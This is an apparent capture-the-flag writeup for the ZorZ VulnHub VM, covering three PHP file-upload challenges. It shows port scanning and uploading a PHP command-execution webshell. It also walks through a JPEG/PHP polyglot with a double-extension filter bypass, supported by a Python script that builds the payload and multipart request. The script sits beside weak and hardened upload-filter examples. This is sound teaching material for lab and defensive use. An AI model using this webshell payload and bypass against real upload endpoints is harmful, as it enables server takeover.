published on in writeup
tags: tophatsec

TopHatSec: ZorZ

This VM contains 3 web application challenges, which focus on file upload and filter bypass.


Only ports 22 and 80 are open.

[email protected]:~# nmap -n -p- -A

22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey: 
|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

Let’s head over to port 80 in a web browser.

Level 1

I downloaded an image off the Internet and uploaded it to the server.

The file uploads, which is good, but now I need to find it. The PHP temporary filename /tmp/phpsu5a08 returned a 404 over HTTP, as did /tmp/rastamouse.jpg. So now it's time to break out the web fuzzers! I didn't get any hits with my usual wfuzz wordlists, but I did with dirb.

The interesting directory is uploads2, though it turns out this is the directory for challenge 2. So I manually tried uploads1 and found rastamouse.jpg there.

I took a copy of /usr/share/webshells/php/php-simple-backdoor.php and uploaded it as catflap1.php. This was uploaded successfully, so it seems this level has no filtering or protection in place at all.

[email protected]:~# curl
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Level 2

Attempting to upload the same PHP file for level 2 fails miserably.

If we intercept the request with Burp, we can see the multipart Content-Disposition header for the file part. Note the filename parameter; we will change this later.

I sent the POST to Burp Repeater and tried various things to get PHP uploaded. After a few tries, I found that the following combination worked: appending the PHP code to the end of the image data (so the file still begins with a valid image header and passes any magic-byte or image check) and giving the file a double extension (so a check that only looks at the final extension sees .jpg, while the server still hands the file to the PHP handler; on Apache this is typically the result of an AddHandler directive for .php that matches the extension anywhere in the filename, not just at the end).

Content-Disposition: form-data; name="upfile"; filename="rastamouse.php.jpg"

When you access the URL, the binary image data is displayed as gibberish, but at the very bottom the output of the successfully executed PHP is shown.

[email protected]:~# curl
uid=33(www-data) gid=33(www-data) groups=33(www-data)

To create the same file outside of Burp, it’s as simple as:

[email protected]:~/vulnhub/zorz/2# cat rastamouse.jpg catflap2.php > catflap2.php.jpg
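As an added example (not code from the original post, and not the VM's own uploader, which the writeup does not show), the following Python reconstructs the Level 2 bypass end to end and shows why it works. build_polyglot does what the cat command above does; build_multipart produces the form-data part with the Content-Disposition filename that was edited in Burp; weak_filter is a hypothetical check of the kind the double extension defeats (allowlist on the final extension plus a JPEG magic-byte check); strict_filter and safe_storage_name are one hardened alternative. FAKE_JPEG and PHP_PAYLOAD are constructed stand-ins for the downloaded image and php-simple-backdoor.php, and the field name upfile is taken from the captured request. Level 1, which has no filter at all, is not modelled.

```python
import re
import uuid
from pathlib import PurePosixPath

# Constructed stand-in for the downloaded JPEG: SOI + JFIF APP0 marker in
# front and the EOI marker at the end, which is all a magic-byte check sees.
FAKE_JPEG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    b"\xff\xd9"
)
# Hypothetical payload standing in for php-simple-backdoor.php.
PHP_PAYLOAD = b"<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"

JPEG_MAGIC = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def build_polyglot(image: bytes, php: bytes) -> bytes:
    """Same as `cat rastamouse.jpg catflap2.php > catflap2.php.jpg`: the image
    stays in front so content checks still see a JPEG, and the PHP engine
    ignores everything outside the <?php ... ?> tags at the end."""
    return image + php


def build_multipart(field: str, filename: str, data: bytes,
                    content_type: str, boundary: str = "") -> tuple:
    """Build the multipart/form-data body and Content-Type header for one file
    part. The filename parameter is the value changed in Burp Repeater."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def weak_filter(filename: str, data: bytes) -> bool:
    """Hypothetical Level-2-style check: final extension must be an image type
    and the bytes must start with JPEG magic. rastamouse.php.jpg passes both,
    yet Apache still runs it as PHP because '.php' is in the name."""
    ext = PurePosixPath(filename).suffix.lower()
    return ext in IMAGE_EXTS and data.startswith(JPEG_MAGIC)


def strict_filter(filename: str, data: bytes) -> bool:
    """Hardened check: exactly one extension from the allowlist (no dots in the
    base name, so double extensions are rejected), JPEG magic at the start, and
    the JPEG end-of-image marker as the last bytes, so anything appended after
    the image is rejected. Re-encoding the image server-side is more robust."""
    name = PurePosixPath(filename).name
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.(jpe?g|png|gif)", name, re.IGNORECASE):
        return False
    if not data.startswith(JPEG_MAGIC) or not data.endswith(JPEG_EOI):
        return False
    return True


def safe_storage_name() -> str:
    """Never store under the client-supplied name: generate the name server-side
    with a fixed extension, and keep the directory free of the PHP handler."""
    return uuid.uuid4().hex + ".jpg"


if __name__ == "__main__":
    poly = build_polyglot(FAKE_JPEG, PHP_PAYLOAD)
    body, ctype = build_multipart("upfile", "rastamouse.php.jpg", poly, "image/jpeg")
    print(ctype)
    print(body[:160])
    print("weak filter accepts polyglot:", weak_filter("rastamouse.php.jpg", poly))
    print("strict filter accepts polyglot:", strict_filter("rastamouse.php.jpg", poly))
    print("strict filter accepts clean jpg:", strict_filter("rastamouse.jpg", FAKE_JPEG))
    print("stored as:", safe_storage_name())
```

Note that the weak check is not wrong about the bytes it inspects; the problem is that it answers the question "is this an image?" when the question that matters is "can the web server be made to execute this?". Any check that does not control the stored filename, the directory's handler configuration, and the trailing content of the file leaves that second question open.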

Level 3

It turns out that my file for Level 2 worked for Level 3 as well. That was easy ^_^.

So let’s collect the flag.

$ ls -l
drwxr-xr-x 2 root     root     4096 Feb 18 22:45 l337saucel337

$ ls -l l337saucel337
-rw-r--r-- 1 root root 400 Feb 18 22:45 SECRETFILE

$ cat l337saucel337/SECRETFILE
Great job so far. This box has 3 uploaders.

The first 2 are pure php, the last one is php w/jquery.

To get credit for this challenge, please submit a write-up or instructions
on how you compromised the uploader or uploaders. If you solve 1, 2, or all
of the uploader challenges, feel free to shoot me an email and let me know!

[email protected]

Thanks for playing!